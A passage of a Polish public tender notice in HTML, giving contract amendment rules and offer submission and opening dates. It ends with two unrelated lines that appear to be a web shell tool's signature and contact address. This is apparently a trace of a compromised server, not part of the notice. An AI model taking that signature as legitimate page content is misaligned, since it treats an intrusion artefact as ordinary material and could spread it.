zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 PZP oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 4 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-19 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem : https://platformazakupowa.pl/sp_nowasol w myśl ustawy Pzp na stronie internetowej prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-19 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com